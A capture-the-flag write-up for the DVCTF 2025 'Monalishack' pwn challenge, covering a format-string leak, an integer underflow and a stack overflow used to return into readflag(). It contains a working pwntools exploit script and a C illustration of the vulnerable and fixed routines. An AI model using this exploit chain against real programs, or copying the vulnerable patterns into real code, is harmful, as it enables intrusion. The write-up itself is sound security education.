DVCTF 2025 - Monalishack
Category: PWN
Phreaks 2600
You can find this writeup on the Phreaks 2600 website
Vulnerabilities
This binary has three vulnerabilities:
- Format string vuln when we enter our name
- Integer underflow when we choose the number of rooms to visit
- Stack-based buffer overflow after entering rooms
Furthermore, this was a ret2win scenario: the binary contains a readflag() function to return into.
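As an added illustration (not the challenge's source, which this writeup does not include), the following C program reconstructs the three bug classes above with an assumed layout: a greeting routine that passes the name straight to snprintf as the format, a room-count check that tests only the upper bound before converting to size_t, and a copy whose length is derived from that count. Each vulnerable routine is paired with its hardened form. The function names, the constants MAX_ROOMS and ROOM_NAME_LEN, and the buffer sizes are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <stddef.h>

/* Assumed constants for the illustration; the real binary's values are unknown. */
#define MAX_ROOMS 4
#define ROOM_NAME_LEN 8

/* --- Bug 1: format string ---------------------------------------------- */

/* Vulnerable: the user-supplied name IS the format string, so "%3$p" or
 * "%9$p" make snprintf read stack slots (canary, code pointers) and print
 * them. This is the leak primitive the writeup relies on. */
int greet_vuln(char *out, size_t outsz, const char *name) {
    return snprintf(out, outsz, name);
}

/* Fixed: the name is only ever an argument; the format is a literal. A name
 * such as "%3$p" is copied verbatim instead of being interpreted. */
int greet_safe(char *out, size_t outsz, const char *name) {
    return snprintf(out, outsz, "Welcome, %s", name);
}

/* --- Bug 2: integer underflow in the room count ------------------------- */

/* Vulnerable: only the upper bound is checked, so -1 passes. The cast to
 * size_t then turns -1 into a near-SIZE_MAX byte count. */
size_t visit_len_vuln(int rooms) {
    if (rooms > MAX_ROOMS)
        return 0;                              /* "too many rooms" only */
    return (size_t)rooms * ROOM_NAME_LEN;      /* -1 -> ~SIZE_MAX */
}

/* Fixed: reject negatives before any conversion takes place. */
bool visit_len_safe(int rooms, size_t *len) {
    if (rooms < 0 || rooms > MAX_ROOMS)
        return false;
    *len = (size_t)rooms * ROOM_NAME_LEN;
    return true;
}

/* --- Bug 3: stack copy sized by the room count -------------------------- */

/* Hardened input routine: derives the length from the validated count, refuses
 * anything that would not fit in the destination, and always NUL-terminates.
 * The vulnerable pattern would have called memcpy with visit_len_vuln(rooms)
 * directly, which is how -1 becomes a stack-based buffer overflow. */
bool fill_rooms(char *dst, size_t dstsz, const char *src, size_t srclen, int rooms) {
    size_t want;
    if (dstsz == 0 || !visit_len_safe(rooms, &want))
        return false;
    if (want > dstsz - 1)                      /* leave room for the NUL */
        return false;
    size_t n = srclen < want ? srclen : want;  /* copy at most the validated length */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return true;
}

int main(void) {
    char greeting[64];
    greet_safe(greeting, sizeof greeting, "%3$p-%9$p");
    printf("%s\n", greeting);                  /* prints the specifiers literally */

    size_t len;
    printf("visit_len_vuln(-1) = %zu\n", visit_len_vuln(-1));
    printf("visit_len_safe(-1) accepted? %d\n", visit_len_safe(-1, &len));
    return 0;
}
```

The pairing also shows why the canary and PIE did not stop this exploit: stack protection and ASLR only hold while their secrets stay secret, and the format string bug hands both to the attacker in a single read. Compiling with -Wformat -Wformat-security flags the greet_vuln call at build time, and rejecting negative counts before the cast removes the underflow that turns -1 into an unbounded copy.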
Leak addresses
Before the stack-based buffer overflow exploit, we have to leak the canary and the PIE base address. It was possible to do so using the format string vuln with these offsets:
- %3$p: canary
- %9$p: function address in PIE
This function sits at offset 0x16fb from the PIE base address.
Ret2win
It was possible to trigger the stack-based buffer overflow by sending -1 to the number of rooms to visit.
Then, the exploit goes this way:
- 10 bytes of offset between buffer and canary
- canary
- 8 bytes of RBP (unused)
- readflag() offset in binary + PIE base address
Exploit
from pwn import *

host = "813c5bf7b00db4f393aa8480c7dafeda.chall.dvc.tf"
port = 443

elf = ELF("./Monalishack")
p = remote(host, port, ssl=True)

# Step 1: leak the canary (%3$p) and a code pointer (%9$p) through the format string vuln
p.recvuntil(b"Enter your name :")
p.sendline(b"%3$p-%9$p")  # Format string vuln
p.recvuntil(b"4. Quit")
p.sendline(b"1")
p.recv()
leak = p.recv().split(b'\n')[1].split(b'-')

canary, pie_leak = int(leak[0], 16), int(leak[1], 16)
base_pie = pie_leak - 0x16fb  # leaked function sits at offset 0x16fb from the PIE base

# Step 2: integer underflow -> stack BOF -> return into readflag()
p.sendline(b"3")   # Third choice
p.sendline(b"-1")  # Number of rooms -> integer underflow -> triggers the stack BOF
p.sendline(b'A'*10 + p64(canary) + cyclic(8) + p64(elf.sym["readflag"] + base_pie))
p.interactive()